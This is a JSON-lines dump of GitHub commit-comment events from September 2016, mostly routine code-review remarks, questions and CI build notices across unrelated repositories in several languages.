{"id":"4543966423","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/manjaro-tools-iso-profiles"},"payload":{"comment":{"id":18973459,"position":null,"line":null,"path":null,"commit_id":"2d778759ccede32cb55a84eed1f5d97b43ad2394","created_at":"2016-09-10T12:18:06Z","updated_at":"2016-09-10T12:18:06Z","body":"mt-0.12.x ? stable branch?"}},"created_at":"2016-09-10T12:18:06Z"}
{"id":"4543969505","type":"CommitCommentEvent","actor":{"login":"achabill"},"repo":{"name":"Glenn-Faison/Chat_App"},"payload":{"comment":{"id":18973464,"position":null,"line":null,"path":null,"commit_id":"40db16a5577e36c567e3b8b3f7e5fab34fa9c3ee","created_at":"2016-09-10T12:20:49Z","updated_at":"2016-09-10T12:20:49Z","body":"Nice. Keep up."}},"created_at":"2016-09-10T12:20:49Z"}
{"id":"4543969520","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"ishantvivek/android_device_samsung_kyleprods"},"payload":{"comment":{"id":18973465,"position":null,"line":null,"path":null,"commit_id":"a5aa06a1dc9148658256793d8b444a5f2eb77de2","created_at":"2016-09-10T12:20:50Z","updated_at":"2016-09-10T12:20:50Z","body":"How do we enable it?"}},"created_at":"2016-09-10T12:20:50Z"}
{"id":"4543972154","type":"CommitCommentEvent","actor":{"login":"kingphard"},"repo":{"name":"kingphard/lccweb"},"payload":{"comment":{"id":18973468,"position":null,"line":null,"path":null,"commit_id":"64c91c011ce9d1ee07096b1fd4b02f05a9fea194","created_at":"2016-09-10T12:23:10Z","updated_at":"2016-09-10T12:23:10Z","body":"hh"}},"created_at":"2016-09-10T12:23:10Z"}
{"id":"4543973998","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18973470,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-10T12:24:48Z","updated_at":"2016-09-10T12:24:48Z","body":"It doesn't raise an error by default, I'd have to look up how to make it raise one "}},"created_at":"2016-09-10T12:24:48Z"}
{"id":"4543974420","type":"CommitCommentEvent","actor":{"login":"db519313080"},"repo":{"name":"db519313080/php49"},"payload":{"comment":{"id":18973472,"position":null,"line":null,"path":null,"commit_id":"777031978ee89d87cfc7e81f4fc3a2d659c9df5d","created_at":"2016-09-10T12:25:10Z","updated_at":"2016-09-10T12:25:10Z","body":"aa"}},"created_at":"2016-09-10T12:25:10Z"}
{"id":"4543975200","type":"CommitCommentEvent","actor":{"login":"linbojin"},"repo":{"name":"TomLous/coursera-parallel-programming-scala"},"payload":{"comment":{"id":18973473,"position":74,"line":107,"path":"src/main/scala/barneshut/package.scala","commit_id":"968b2c7e8e4c00c9d9f230416554e1f84ed6772a","created_at":"2016-09-10T12:25:49Z","updated_at":"2016-09-10T12:25:49Z","body":"fork is immutable, so this line will not change (insert body into) the original fork. Try to use foldLeft:\r\n`val finalFork = (b +: bodies).foldLeft(fork)( (fork, b) => fork.insert(b))`"}},"created_at":"2016-09-10T12:25:49Z"}
{"id":"4543976762","type":"CommitCommentEvent","actor":{"login":"Ste74"},"repo":{"name":"manjaro/manjaro-tools-iso-profiles"},"payload":{"comment":{"id":18973474,"position":null,"line":null,"path":null,"commit_id":"2d778759ccede32cb55a84eed1f5d97b43ad2394","created_at":"2016-09-10T12:27:14Z","updated_at":"2016-09-10T12:27:14Z","body":"Yes... 0.12.x series and stable... try only one time... and get the error.. if you want revert and tomorrow evening try to rebuild an ISO... now i m on Modigliano Veneto :p\nIl 10/set/2016 14:18, Bernhard Landauer <notifications@github.com> ha scritto:mt-0.12.x ? stable branch?\r\n\r\n—You are receiving this because you authored the thread.Reply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2016-09-10T12:27:14Z"}
{"id":"4543977024","type":"CommitCommentEvent","actor":{"login":"nhgrif"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":18973475,"position":34,"line":76,"path":"Sources/DataManager.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-10T12:27:28Z","updated_at":"2016-09-10T12:27:28Z","body":"We can check with @lgauthier, but in my opinion, this should probably be\r\n\r\n```\r\nfunc log(error: NSError, file: StatisString, function: StaticString, line: UInt)\r\n```"}},"created_at":"2016-09-10T12:27:28Z"}
{"id":"4543977130","type":"CommitCommentEvent","actor":{"login":"mhfrough"},"repo":{"name":"ImRamis/Idea"},"payload":{"comment":{"id":18973476,"position":null,"line":null,"path":null,"commit_id":"fa81686d155149f5d1cda86a7c8c3abb7da18f50","created_at":"2016-09-10T12:27:34Z","updated_at":"2016-09-10T12:27:34Z","body":"Thanks"}},"created_at":"2016-09-10T12:27:34Z"}
{"id":"4543977216","type":"CommitCommentEvent","actor":{"login":"scidom"},"repo":{"name":"JuliaLang/METADATA.jl"},"payload":{"comment":{"id":18973477,"position":null,"line":null,"path":null,"commit_id":"e45b59f3136cf03282f723619f213fde92cba0fd","created_at":"2016-09-10T12:27:39Z","updated_at":"2016-09-10T12:27:39Z","body":"I will be more careful next time @tkelman, it wasn't even intentional. When I tried to quickly edit the textfile with the url online on github, I submitted it hoping it will become a PR. Anyhow, I will keep this in mind for next time."}},"created_at":"2016-09-10T12:27:39Z"}
{"id":"4543978721","type":"CommitCommentEvent","actor":{"login":"nhgrif"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":18973478,"position":76,"line":134,"path":"Sources/DataManager.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-10T12:28:54Z","updated_at":"2016-09-10T12:28:54Z","body":"This is going to be the same comment as above.  I think:\r\n\r\n```\r\nsetUp(dataModelName:\r\n```\r\n\r\nor perhaps:\r\n\r\n```\r\nsetUpDataModel(name:\r\n```"}},"created_at":"2016-09-10T12:28:54Z"}
{"id":"4543979622","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18973479,"position":19,"line":261,"path":"pom.xml","commit_id":"d43c18a79d3418ab848417ae84f4de164257021c","created_at":"2016-09-10T12:29:42Z","updated_at":"2016-09-10T12:29:42Z","body":"@Atamariya No way ;-)\r\nhttps://github.com/UniversalMediaServer/UniversalMediaServer/commit/6b82f5cdd0bf1dbda70ef9382d850c64c32d2189"}},"created_at":"2016-09-10T12:29:42Z"}
{"id":"4543979860","type":"CommitCommentEvent","actor":{"login":"nhgrif"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":18973480,"position":64,"line":111,"path":"Sources/DataManager.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-10T12:29:54Z","updated_at":"2016-09-10T12:29:54Z","body":"Let's make sure that `fileprivate` is actually correct here.  I think `private` might be more correct here (the automated tool would have converted to `fileprivate` because that has the same behavior as Swift 2.x)"}},"created_at":"2016-09-10T12:29:54Z"}
{"id":"4543981232","type":"CommitCommentEvent","actor":{"login":"c00ni"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18973481,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-10T12:30:55Z","updated_at":"2016-09-10T12:30:55Z","body":"Oh if it's a bother, whatever... Just thought you'd made it suppress the error.\r\n\r\nBtw, why did you think the spanish ñ would occur in Australian addresses? If anything there would be more umlauts in our POIs (German restaurants)."}},"created_at":"2016-09-10T12:30:55Z"}
{"id":"4543981369","type":"CommitCommentEvent","actor":{"login":"fabiand"},"repo":{"name":"rmohr/cni"},"payload":{"comment":{"id":18973482,"position":87,"line":87,"path":"plugins/meta/libkv/libkv.go","commit_id":"d122c3240a11f295511300bd03546c5e080513b2","created_at":"2016-09-10T12:31:01Z","updated_at":"2016-09-10T12:31:01Z","body":"`/var/lib` contains data which is specific to a host, and persistent between reboots.\r\n\r\nBut the data we want to stare is actually fetched from etcd and thus rather a runtime thing. I'd thus suggest to use `/var/run` for storing data fetched from etcd."}},"created_at":"2016-09-10T12:31:01Z"}
{"id":"4543981852","type":"CommitCommentEvent","actor":{"login":"whoburg"},"repo":{"name":"hoburg/gpkit"},"payload":{"comment":{"id":18973484,"position":null,"line":null,"path":null,"commit_id":"f7de668f132f6334c2134efabb717c239c76e516","created_at":"2016-09-10T12:31:24Z","updated_at":"2016-09-10T12:31:24Z","body":"@bqpd, this got merged w/o review."}},"created_at":"2016-09-10T12:31:24Z"}
{"id":"4543982065","type":"CommitCommentEvent","actor":{"login":"nhgrif"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":18973485,"position":179,"line":253,"path":"Sources/DataManager.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-10T12:31:35Z","updated_at":"2016-09-10T12:31:35Z","body":"Is this fully necessary?  Did it not like implicitly inferring this type?\r\n\r\nWhat if we instead do...\r\n\r\n```\r\nlet request = NSFetchRequest<NSFetchRequestResult>(entityName: String(describing: entity))\r\n```"}},"created_at":"2016-09-10T12:31:35Z"}
{"id":"4543982152","type":"CommitCommentEvent","actor":{"login":"fabiand"},"repo":{"name":"rmohr/cni"},"payload":{"comment":{"id":18973486,"position":103,"line":103,"path":"plugins/meta/libkv/libkv.go","commit_id":"d122c3240a11f295511300bd03546c5e080513b2","created_at":"2016-09-10T12:31:38Z","updated_at":"2016-09-10T12:31:38Z","body":"The comment does not match the code - I suspect a copy'n'paste issue ;)"}},"created_at":"2016-09-10T12:31:38Z"}
{"id":"4543983458","type":"CommitCommentEvent","actor":{"login":"polesye"},"repo":{"name":"stergen/js_market"},"payload":{"comment":{"id":18973489,"position":167,"line":135,"path":"js/product.js","commit_id":"312457e40ca4dcf3cccce9734f581fe189d75eab","created_at":"2016-09-10T12:32:46Z","updated_at":"2016-09-10T12:32:46Z","body":"You can put cart instance as an argument.\r\n```js\r\n    var cart = new Cart(DB),\r\n        productList = new ViewProductList(DB, cart);\r\n```"}},"created_at":"2016-09-10T12:32:46Z"}
{"id":"4543983479","type":"CommitCommentEvent","actor":{"login":"nhgrif"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":18973490,"position":215,"line":314,"path":"Sources/DataManager.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-10T12:32:47Z","updated_at":"2016-09-10T12:32:47Z","body":"Again, I think we probably ought to reword this:\r\n\r\n```\r\ndelete(objects: [NSManagedObject], in context: NSManagedObjectContext)\r\n```"}},"created_at":"2016-09-10T12:32:47Z"}
{"id":"4543983542","type":"CommitCommentEvent","actor":{"login":"vbmithr"},"repo":{"name":"ocsigen/eliom"},"payload":{"comment":{"id":18973491,"position":37,"line":64,"path":"src/lib/eliom_service_sigs.shared.mli","commit_id":"036aaaaeac95aeff40cf11b90a377a6662b446b1","created_at":"2016-09-10T12:32:50Z","updated_at":"2016-09-10T12:32:50Z","body":"LOL! Seriously ?!"}},"created_at":"2016-09-10T12:32:50Z"}
{"id":"4543984601","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18973494,"position":null,"line":null,"path":null,"commit_id":"843e0fea2549add6a7d1d6c752c5906691d601d6","created_at":"2016-09-10T12:33:42Z","updated_at":"2016-09-10T12:33:42Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/843e0fea2549add6a7d1d6c752c5906691d601d6#commitcomment-18973210) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/d6d4d2ca0dace26afa89e954d6a16db24a7dd0d4/843e0fe_vs_7126d89/report.md). cc @jrevels"}},"created_at":"2016-09-10T12:33:42Z"}
{"id":"4543984643","type":"CommitCommentEvent","actor":{"login":"adam-7"},"repo":{"name":"gambit/gambit"},"payload":{"comment":{"id":18973495,"position":null,"line":null,"path":null,"commit_id":"fc75d7363281a72a9b864f0d3d17889136a4b743","created_at":"2016-09-10T12:33:45Z","updated_at":"2016-09-10T12:33:45Z","body":"What were the implications of the previous behavior except for the UTF-8 decoding bug (= the issue reported at https://github.com/gambit/gambit/issues/189 )?"}},"created_at":"2016-09-10T12:33:45Z"}
{"id":"4543985982","type":"CommitCommentEvent","actor":{"login":"KristofferC"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18973496,"position":null,"line":null,"path":null,"commit_id":"843e0fea2549add6a7d1d6c752c5906691d601d6","created_at":"2016-09-10T12:34:56Z","updated_at":"2016-09-10T12:34:56Z","body":"Interesting SIMD improvements ;)"}},"created_at":"2016-09-10T12:34:56Z"}
{"id":"4543987028","type":"CommitCommentEvent","actor":{"login":"cajogos"},"repo":{"name":"cajogos/easy-steps"},"payload":{"comment":{"id":18973499,"position":null,"line":null,"path":null,"commit_id":"bd7fd7fa9ff17c6ab46fc265a85d6f1fabd34ece","created_at":"2016-09-10T12:35:50Z","updated_at":"2016-09-10T12:35:50Z","body":"![bitmoji](https://render.bitstrips.com/v2/cpanel/10212404-110014122_2-s4-v1.png?transparent=1&width=246)"}},"created_at":"2016-09-10T12:35:50Z"}
{"id":"4543987538","type":"CommitCommentEvent","actor":{"login":"nhgrif"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":18973501,"position":54,"line":68,"path":"Tests/NSManagedObjectContext+TestSwizzle.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-10T12:36:14Z","updated_at":"2016-09-10T12:36:14Z","body":"Do you have a link to the Stack Overflow post?"}},"created_at":"2016-09-10T12:36:14Z"}
{"id":"4543988984","type":"CommitCommentEvent","actor":{"login":"polesye"},"repo":{"name":"stergen/js_market"},"payload":{"comment":{"id":18973503,"position":118,"line":90,"path":"js/product.js","commit_id":"312457e40ca4dcf3cccce9734f581fe189d75eab","created_at":"2016-09-10T12:37:33Z","updated_at":"2016-09-10T12:37:33Z","body":"\r\n    // @TODO: Fix context. Look at .bind ...\r\n    listElement.addEventListener( 'click', this.productOperation.bind(this), false );"}},"created_at":"2016-09-10T12:37:33Z"}
{"id":"4543989650","type":"CommitCommentEvent","actor":{"login":"masiha68"},"repo":{"name":"malsup/form"},"payload":{"comment":{"id":18973505,"position":null,"line":null,"path":null,"commit_id":"40e99d21894b11dc8fd91adcc95b4c5ec4a3b32f","created_at":"2016-09-10T12:38:06Z","updated_at":"2016-09-10T12:38:06Z","body":"i am use is 1.8.2 and change value but my problem does not sloved !!!\r\nare you sure this worked !!"}},"created_at":"2016-09-10T12:38:06Z"}
{"id":"4543990447","type":"CommitCommentEvent","actor":{"login":"lastavenger"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":18973506,"position":null,"line":null,"path":null,"commit_id":"aa2a49ada31574ee46c53b4fec6f6cba70aaa6ec","created_at":"2016-09-10T12:38:45Z","updated_at":"2016-09-10T12:38:45Z","body":"为什么 lilac 没有 build ruby-rs-inotify 呢？我也没收到报错信息。 @lilydjwg "}},"created_at":"2016-09-10T12:38:45Z"}
{"id":"4543990499","type":"CommitCommentEvent","actor":{"login":"polesye"},"repo":{"name":"stergen/js_market"},"payload":{"comment":{"id":18973507,"position":129,"line":101,"path":"js/product.js","commit_id":"312457e40ca4dcf3cccce9734f581fe189d75eab","created_at":"2016-09-10T12:38:47Z","updated_at":"2016-09-10T12:38:47Z","body":"typo `Cart`"}},"created_at":"2016-09-10T12:38:47Z"}
{"id":"4543991115","type":"CommitCommentEvent","actor":{"login":"polesye"},"repo":{"name":"stergen/js_market"},"payload":{"comment":{"id":18973509,"position":129,"line":101,"path":"js/product.js","commit_id":"312457e40ca4dcf3cccce9734f581fe189d75eab","created_at":"2016-09-10T12:39:17Z","updated_at":"2016-09-10T12:39:17Z","body":"Cart is a model and should not know anything about event.\r\nPlease work with `productId, count`"}},"created_at":"2016-09-10T12:39:17Z"}
{"id":"4543991580","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"sumoist/basic_course"},"payload":{"comment":{"id":18973510,"position":1,"line":1,"path":"Lesson_5/modules.rb","commit_id":"b90426f975944ba440914e176b792ce976da0b88","created_at":"2016-09-10T12:39:40Z","updated_at":"2016-09-10T12:39:40Z","body":"В Ruby не требуется чтобы имя файла совпадало с именем модуля или класса в нём. Но всё же здесь предчувствую потенциальную угрозу. Что дальше будет происходить с этим файлом? Будем накидывать в него ещё модули? Ведь в Ruby можно в один файл запихнуть сколько угодно модулей и (или) классов.\r\n\r\nВ общем, лучше назвать файл `company`, а если хочется обозначить слой модулей, то просто положить этот файл в каталог `modules` или `extensions`, что-то подобное."}},"created_at":"2016-09-10T12:39:40Z"}
{"id":"4543991823","type":"CommitCommentEvent","actor":{"login":"polesye"},"repo":{"name":"stergen/js_market"},"payload":{"comment":{"id":18973511,"position":124,"line":96,"path":"js/product.js","commit_id":"312457e40ca4dcf3cccce9734f581fe189d75eab","created_at":"2016-09-10T12:39:52Z","updated_at":"2016-09-10T12:39:52Z","body":"please use `{}` instead of `new Object()`."}},"created_at":"2016-09-10T12:39:52Z"}
{"id":"4543992334","type":"CommitCommentEvent","actor":{"login":"Ofiri93"},"repo":{"name":"Ofiri93/MAZ"},"payload":{"comment":{"id":18973512,"position":null,"line":null,"path":null,"commit_id":"e62bf6f614857f70fec52ed9446db8a679fa040d","created_at":"2016-09-10T12:40:14Z","updated_at":"2016-09-10T12:40:14Z","body":"חיחיח"}},"created_at":"2016-09-10T12:40:14Z"}
{"id":"4543992393","type":"CommitCommentEvent","actor":{"login":"variscarey"},"repo":{"name":"variscarey/M4650-Repo"},"payload":{"comment":{"id":18973513,"position":null,"line":null,"path":null,"commit_id":"3da24c77bb67e9ec4d010a9b006c57b709817fde","created_at":"2016-09-10T12:40:16Z","updated_at":"2016-09-10T12:40:16Z","body":"While r-x is not equal to x-r,  (r-x) squared is equal to (x-r) squared.\nIt is interesting to note that the software flipped r and x in the\nderivation, as\nnormally I would think that it would u -substitute u=50(x-r)   and preserve\nthe order.\n\nVaris\n\n\nOn Sat, Sep 10, 2016 at 12:22 AM, Cody Smith <notifications@github.com>\nwrote:\n\n> @variscarey <https://github.com/variscarey> I believe there is yet\n> another issue with deriv, please see the attached file.\n>\n> [image: issue]\n> <https://cloud.githubusercontent.com/assets/9948631/18408422/912236e8-76ec-11e6-823b-b68dad05bd0b.PNG>\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/variscarey/M4650-Repo/commit/3da24c77bb67e9ec4d010a9b006c57b709817fde#commitcomment-18972782>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGfn2Wm5kXv8sIR2E4NnQB9W6g4uIOXHks5qokyUgaJpZM4J5pjb>\n> .\n>\n\n\n\n-- \nVaris Carey\nAssistant Professor\nDepartment of Mathematical and Statistical Sciences\nUniversity of Colorado Denver\n"}},"created_at":"2016-09-10T12:40:16Z"}
{"id":"4543992573","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18973515,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-10T12:40:25Z","updated_at":"2016-09-10T12:40:25Z","body":"I thought of the united states before. Oh right, you're from Australia :D That place where all the poisonous animals live and most of the drinking water will be gone in a few years^^"}},"created_at":"2016-09-10T12:40:25Z"}
{"id":"4543992986","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"sumoist/basic_course"},"payload":{"comment":{"id":18973516,"position":24,"line":79,"path":"Lesson_5/train.rb","commit_id":"b90426f975944ba440914e176b792ce976da0b88","created_at":"2016-09-10T12:40:44Z","updated_at":"2016-09-10T12:40:44Z","body":"Что будет в этом случае?\r\n\r\n```ruby\r\ncargo_star = CargoTrain.new(141)\r\nred_arrow  = PassengerTrain.new(141)\r\n\r\np CargoTrain.find(141)\r\n```"}},"created_at":"2016-09-10T12:40:44Z"}
{"id":"4543993477","type":"CommitCommentEvent","actor":{"login":"polesye"},"repo":{"name":"stergen/js_market"},"payload":{"comment":{"id":18973517,"position":141,"line":113,"path":"js/product.js","commit_id":"312457e40ca4dcf3cccce9734f581fe189d75eab","created_at":"2016-09-10T12:41:07Z","updated_at":"2016-09-10T12:41:07Z","body":"you can calc these information during rendering."}},"created_at":"2016-09-10T12:41:07Z"}
{"id":"4543993572","type":"CommitCommentEvent","actor":{"login":"hotoo"},"repo":{"name":"ziluo/primer-template"},"payload":{"comment":{"id":18973518,"position":5,"line":35,"path":"src/preParse.js","commit_id":"19d27baad86e5f83fd053d14721a09b662c86177","created_at":"2016-09-10T12:41:11Z","updated_at":"2016-09-10T12:41:11Z","body":"1. process 应该不用判断。\r\n2. 一般使用 `webpack --watch` 来 watch 变更，可以试试用 `process.argv` 来判断。\r\n3. 现在的方案也可以接受吧。"}},"created_at":"2016-09-10T12:41:11Z"}
{"id":"4543993755","type":"CommitCommentEvent","actor":{"login":"vin395685361"},"repo":{"name":"vin395685361/cici"},"payload":{"comment":{"id":18973519,"position":null,"line":null,"path":null,"commit_id":"06f316a249712798547b48f3dc87b7c7fb7b4902","created_at":"2016-09-10T12:41:18Z","updated_at":"2016-09-10T12:41:18Z","body":"more love for the world"}},"created_at":"2016-09-10T12:41:18Z"}
{"id":"4543994311","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18973520,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-10T12:41:43Z","updated_at":"2016-09-10T12:41:43Z","body":"I can't even find, why it doesn't put out a port bind error, only cases where it does that. So I'd have to dig through the code of it to find the right place and it's not really that important I guess."}},"created_at":"2016-09-10T12:41:43Z"}
{"id":"4543994337","type":"CommitCommentEvent","actor":{"login":"koola"},"repo":{"name":"wswebcreation/pix-diff"},"payload":{"comment":{"id":18973521,"position":22,"line":49,"path":"index.js","commit_id":"661f9663b4680ddbd16ed6234c6211a919810044","created_at":"2016-09-10T12:41:44Z","updated_at":"2016-09-10T12:41:44Z","body":"Good point! How about a function like:\r\n```\r\nfunction load(value, defaultValue) {\r\n\treturn (value == null) ? defaultValue : value;\r\n}\r\n```"}},"created_at":"2016-09-10T12:41:44Z"}
{"id":"4543994496","type":"CommitCommentEvent","actor":{"login":"polesye"},"repo":{"name":"stergen/js_market"},"payload":{"comment":{"id":18973522,"position":145,"line":117,"path":"js/product.js","commit_id":"312457e40ca4dcf3cccce9734f581fe189d75eab","created_at":"2016-09-10T12:41:51Z","updated_at":"2016-09-10T12:41:51Z","body":"typo `this.sum`"}},"created_at":"2016-09-10T12:41:51Z"}
{"id":"4543995385","type":"CommitCommentEvent","actor":{"login":"polesye"},"repo":{"name":"stergen/js_market"},"payload":{"comment":{"id":18973523,"position":145,"line":117,"path":"js/product.js","commit_id":"312457e40ca4dcf3cccce9734f581fe189d75eab","created_at":"2016-09-10T12:42:37Z","updated_at":"2016-09-10T12:42:37Z","body":"you can calc it in this method. Try to use `reduce` method."}},"created_at":"2016-09-10T12:42:37Z"}
{"id":"4543995655","type":"CommitCommentEvent","actor":{"login":"polesye"},"repo":{"name":"stergen/js_market"},"payload":{"comment":{"id":18973525,"position":148,"line":120,"path":"js/product.js","commit_id":"312457e40ca4dcf3cccce9734f581fe189d75eab","created_at":"2016-09-10T12:42:52Z","updated_at":"2016-09-10T12:42:52Z","body":"please calculate count in this method."}},"created_at":"2016-09-10T12:42:52Z"}
{"id":"4543997116","type":"CommitCommentEvent","actor":{"login":"AndreasLorensen"},"repo":{"name":"AndreasLorensen/Powershell.Zendesk"},"payload":{"comment":{"id":18973526,"position":null,"line":null,"path":null,"commit_id":"0c08a03f6ba4cf59c22434ba2b9db56181090737","created_at":"2016-09-10T12:44:10Z","updated_at":"2016-09-10T12:44:10Z","body":"Hi Matthew\r\nI was thinking on making a powershell module for Zendesk. Primaraly for learning powershell, and the Zendesk API. \r\nJust notised you have made this project, but you havnt uploaded anything.\r\ndo you have something interesting I could look at and maybe work further on ?"}},"created_at":"2016-09-10T12:44:10Z"}
{"id":"4543997345","type":"CommitCommentEvent","actor":{"login":"mtomov"},"repo":{"name":"solidusio/solidus"},"payload":{"comment":{"id":18973527,"position":null,"line":null,"path":null,"commit_id":"6a4cb263785f4bec30dabf33ce6a1efd61fa2e32","created_at":"2016-09-10T12:44:21Z","updated_at":"2016-09-10T12:44:21Z","body":":+1:  Very nice change"}},"created_at":"2016-09-10T12:44:21Z"}
{"id":"4543997914","type":"CommitCommentEvent","actor":{"login":"lilydjwg"},"repo":{"name":"archlinuxcn/lilac"},"payload":{"comment":{"id":18973529,"position":17,"line":28,"path":"lilacrun","commit_id":"ea0c33e3f9a7e1bab3071bc0496674f051511670","created_at":"2016-09-10T12:44:50Z","updated_at":"2016-09-10T12:44:50Z","body":"我也不清楚……你去看看 shellcheck 的文档？"}},"created_at":"2016-09-10T12:44:50Z"}
{"id":"4543998942","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":18973530,"position":null,"line":null,"path":null,"commit_id":"d737971fa82ed1e3330e4a4d09a712af2afb3927","created_at":"2016-09-10T12:45:46Z","updated_at":"2016-09-10T12:45:46Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 427](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1184&buildTypeId=XbimEssentials_XbimEssentials) is now running\n"}},"created_at":"2016-09-10T12:45:46Z"}
{"id":"4543999348","type":"CommitCommentEvent","actor":{"login":"houkanshan"},"repo":{"name":"SerotoninPharmaceuticals/LD36"},"payload":{"comment":{"id":18973531,"position":6,"line":221,"path":"source/sprites/TechThing.hx","commit_id":"22f0cdf533cb8a39fca71aab162722f73c759ec0","created_at":"2016-09-10T12:46:07Z","updated_at":"2016-09-10T12:46:07Z","body":"+15 的意思是？"}},"created_at":"2016-09-10T12:46:07Z"}
{"id":"4543999585","type":"CommitCommentEvent","actor":{"login":"jiaozn"},"repo":{"name":"jiaozn/exercise_proxy"},"payload":{"comment":{"id":18973532,"position":null,"line":null,"path":null,"commit_id":"449efa9687ee03e6e9a7052b109babfc47737dc8","created_at":"2016-09-10T12:46:19Z","updated_at":"2016-09-10T12:46:19Z","body":"Init commit"}},"created_at":"2016-09-10T12:46:19Z"}
{"id":"4543999609","type":"CommitCommentEvent","actor":{"login":"houkanshan"},"repo":{"name":"SerotoninPharmaceuticals/LD36"},"payload":{"comment":{"id":18973533,"position":6,"line":221,"path":"source/sprites/TechThing.hx","commit_id":"22f0cdf533cb8a39fca71aab162722f73c759ec0","created_at":"2016-09-10T12:46:20Z","updated_at":"2016-09-10T12:46:20Z","body":"哦没事"}},"created_at":"2016-09-10T12:46:20Z"}
{"id":"4544000492","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"absurdean/.net_ex1"},"payload":{"comment":{"id":18973535,"position":26,"line":26,"path":"sms_spam/sms _spam/Program.cs","commit_id":"21495f4556938e48b0fca71ab2c58cbec6a53a6b","created_at":"2016-09-10T12:46:58Z","updated_at":"2016-09-10T12:46:58Z","body":"Можно было использовать коллекцию Dictionary, тогда можно избежать второго цикла."}},"created_at":"2016-09-10T12:46:58Z"}
{"id":"4544000994","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":18973536,"position":null,"line":null,"path":null,"commit_id":"d737971fa82ed1e3330e4a4d09a712af2afb3927","created_at":"2016-09-10T12:47:22Z","updated_at":"2016-09-10T12:47:22Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 427](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1184&buildTypeId=XbimEssentials_XbimEssentials) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:35"}},"created_at":"2016-09-10T12:47:22Z"}
{"id":"4544001867","type":"CommitCommentEvent","actor":{"login":"axypas"},"repo":{"name":"axypas/clippy.js"},"payload":{"comment":{"id":18973539,"position":null,"line":null,"path":null,"commit_id":"b8c623cca1609c71530458188c307f00a29b562a","created_at":"2016-09-10T12:48:06Z","updated_at":"2016-09-10T12:48:06Z","body":"If you want to choose to enable or disabled, you would have to modify agent.js, specifically the following line:\r\n\r\n    this._animator = new clippy.Animator(this._el, path, data, sounds);\r\n\r\nand add the options parameter such that it becomes:\r\n\r\n    this._animator = new clippy.Animator(this._el, path, data, sounds, options);\r\n\r\nYou would also need to modify the contructor of Agent. \r\n\r\nPersonally I just wanted to have the sound always disabled, so I have not done all the required changes. If you always want the sound, you can revert the changes.\r\n\r\n"}},"created_at":"2016-09-10T12:48:06Z"}
{"id":"4544002370","type":"CommitCommentEvent","actor":{"login":"galkahana"},"repo":{"name":"galkahana/PDF-Writer"},"payload":{"comment":{"id":18973540,"position":null,"line":null,"path":null,"commit_id":"5f7c9d0769ed301132561d7e3fb310d4cca8cf1d","created_at":"2016-09-10T12:48:30Z","updated_at":"2016-09-10T12:48:30Z","body":"You're no lazy man. doing a good job :).\r\nI'm just amazed at where did you get those hex/listeral strings that gave you trouble. do you have such pdfs?"}},"created_at":"2016-09-10T12:48:30Z"}
